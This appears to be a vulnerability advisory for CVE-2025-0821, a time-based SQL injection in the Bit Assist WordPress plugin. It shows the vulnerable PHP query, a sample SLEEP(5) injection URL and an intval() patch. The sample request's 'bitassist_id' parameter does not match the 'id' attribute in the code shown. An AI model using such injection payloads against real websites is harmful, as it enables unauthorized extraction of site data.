CVE-2025-0821 - Time-based SQL Injection Vulnerability in Bit Assist Plugin for WordPress

A new vulnerability has been discovered in the Bit Assist plugin for WordPress, which affects all versions up to, and including, 1.5.2. This vulnerability, labeled as CVE-2025-0821, allows authenticated attackers with Subscriber-level access and above, to perform time-based SQL Injection attacks via the 'id' parameter of the plugin. This is due to insufficient escaping of user-supplied parameters and inadequate preparation of existing SQL queries. Consequently, attackers can append additional SQL queries to extract sensitive information from the targeted WordPress website's database.

Vulnerability Type: Time-based SQL Injection

Impact: Data Breach, Extraction of sensitive information

Exploit Code

The following code snippet demonstrates the SQL Injection vulnerability in Bit Assist plugin, found in the 'bitassist_shortcode_handler()' function:

function bitassist_shortcode_handler( $atts ) {
  global $wpdb;
  
  // ...other code...

  // Gathering the 'id' parameter
  $id = $atts['id'];

  // SQL query without proper escaping
  $query = "SELECT * FROM " . BITASSIST_TABLE_NAME . " WHERE id=$id;";
  $result = $wpdb->get_results( $query );

  // ...other code...  
}

As seen in the code snippet above, the 'id' parameter is not properly escaped before being included in the SQL query, thus allowing an attacker to append malicious SQL queries.

Exploit

To exploit this vulnerability, an attacker with Subscriber-level access or above can send a request to the vulnerable WordPress website containing a specially crafted SQL query, such as:

http://example.com/?bitassist_id=1 AND SLEEP(5) --

In this example, the attacker injects an SQL command that waits for 5 seconds (SLEEP(5)) before returning the result. If the website's response is delayed by 5 seconds, this confirms the presence of the vulnerability.

Mitigation

To mitigate this vulnerability, users of the Bit Assist plugin should update to the latest version. In addition, they can apply the following patch to the 'bitassist_shortcode_handler()' function:

function bitassist_shortcode_handler_fixed( $atts ) {
  global $wpdb;
  
  // ...other code...

  // Gathering the 'id' parameter and escaping it using 'intval()'
  $id = intval( $atts['id'] );

  // SQL query with proper escaping
  $query = "SELECT * FROM " . BITASSIST_TABLE_NAME . " WHERE id=$id;";
  $result = $wpdb->get_results( $query );

  // ...other code...  
}

This patch ensures the 'id' parameter is correctly escaped using the intval() function, thus preventing SQL Injection attacks.

Original References

1. CVE-2025-0821 in National Vulnerability Database
2. WordPress Vulnerability Database (WPDV) – Bit Assist Plugin
3. Exploit-DB: CVE-2025-0821 exploit

Conclusion

The Bit Assist plugin for WordPress, in all versions up to and including 1.5.2, is vulnerable to time-based SQL Injection attacks via the 'id' parameter due to insufficient escaping and preparation of SQL queries. To secure their websites, users should update to the latest version of the plugin and apply the provided patch to remediate the issue.

Timeline

Published on: 02/14/2025 11:15:10 UTC